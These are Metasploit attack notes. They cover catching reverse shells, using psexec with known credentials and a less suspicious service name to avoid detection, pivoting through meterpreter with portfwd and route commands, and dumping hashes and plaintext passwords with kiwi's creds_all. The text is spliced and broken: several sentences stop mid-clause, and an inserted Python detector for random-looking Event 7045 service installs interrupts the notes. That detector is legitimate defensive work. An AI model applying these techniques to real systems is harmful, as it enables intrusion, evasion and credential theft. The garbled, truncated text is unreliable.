Who cares if it's easy? That's the point, right?
Use exploit/multi/handler to catch reverse shells and manage several sessions. Make sure the handler is set to the same payload the target is running, or it won't catch the connection.
Use the exploit/windows/smb/psexec module with known credentials to create meterpreter sessions easily, then pivot and exploit further. You can set the SERVICE_FILENAME option to replace the random garbage name the module uses by default, because that is suspicious (using something like
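A defender's-side check for the psexec service artifact described above, added here as an example that is not part of these notes or of Metasploit itself: it scans constructed Windows Event ID 7045 (service installed) records and flags service or binary names that look randomly generated. The case-flip heuristic and its threshold are assumptions of this example, not a documented Metasploit property.

```python
# Constructed records standing in for Windows System log Event ID 7045
# ("A service was installed in the system"), flattened to key=value fields.
# These lines are made up for this example, not real captured logs.
SAMPLE_7045 = [
    "EventID=7045 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe Account=LocalSystem",
    "EventID=7045 ServiceName=XKQwLcPtZvBn ImagePath=%SYSTEMROOT%\\pRvTqLmE.exe Account=LocalSystem",
    "EventID=7045 ServiceName=WinHttpAutoProxySvc ImagePath=C:\\Windows\\System32\\svchost.exe Account=LocalSystem",
    "EventID=7045 ServiceName=hOqjaRtEmz ImagePath=%SYSTEMROOT%\\zKwPAqRb.exe Account=LocalSystem",
]

def parse_event(line):
    """Split a flattened key=value record into a dict (values contain no spaces here)."""
    return dict(tok.split("=", 1) for tok in line.split())

def case_flip_ratio(name):
    """Fraction of adjacent character pairs whose case differs.

    Randomly generated mixed-case strings flip case almost every character,
    while real service names, even camel-case ones, flip far less often.
    """
    pairs = list(zip(name, name[1:]))
    if not pairs:
        return 0.0
    flips = sum(1 for a, b in pairs if a.isupper() != b.isupper())
    return flips / len(pairs)

def looks_random(name, min_len=8, threshold=0.6):
    """True for long, letters-only names with near-constant case flipping
    (threshold is a heuristic chosen for this example)."""
    return name.isalpha() and len(name) >= min_len and case_flip_ratio(name) >= threshold

def suspicious_service_installs(lines):
    """Return (ServiceName, ImagePath) for 7045 records whose service name or
    binary file name looks randomly generated."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7045":
            continue
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        stem = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]  # file name without extension
        if looks_random(name) or looks_random(stem):
            hits.append((name, path))
    return hits

if __name__ == "__main__":
    for name, path in suspicious_service_installs(SAMPLE_7045):
        print(f"suspicious service install: {name} -> {path}")
```

Feed it real 7045 records exported in the same key=value shape and tune the threshold against your own baseline of legitimate service names.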
The meterpreter payload is a fancy shell: a series of DLLs injected into a process's memory. It doesn't touch the disk and creates no separate process. All comms over meterpreter are TLS encrypted unless you specifically tell it not to.
# Below adds a port fwd, localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1
# Below adds a route to move all traffic for a subnet thru meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1 # routes thru session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1 # routes thru session 1 for host 10.0.0.5
Sessions are managed with the sessions -l command. Channels inside sessions are managed with the channel -l command. Upgrade existing shells with the sessions -u 1 command.
CTRL-Z will background a channel or session.
Load additional modules using use [module name].
We can load mimikatz directly into a running meterpreter session, which gives us serious power. We need to be running as SYSTEM, and the process we're in must have the same architecture as the host.
Check whether the arch types match with sysinfo, and check the Meterpreter info to make sure they match. If we need to move, check which running processes have the correct arch and are running as SYSTEM with ps -A x64 -s, then move with migrate [PID]. Validate the arch and meterpreter types match with
Now we can import the mimikatz module with load kiwi. Running help will show the new mimikatz commands we can use, and creds_all will dump all available hashes and plaintext passwords!
Metasploit is a modular combination of scanners, exploits, payloads, and post modules.
Having issues importing a module? Make sure you check the logs at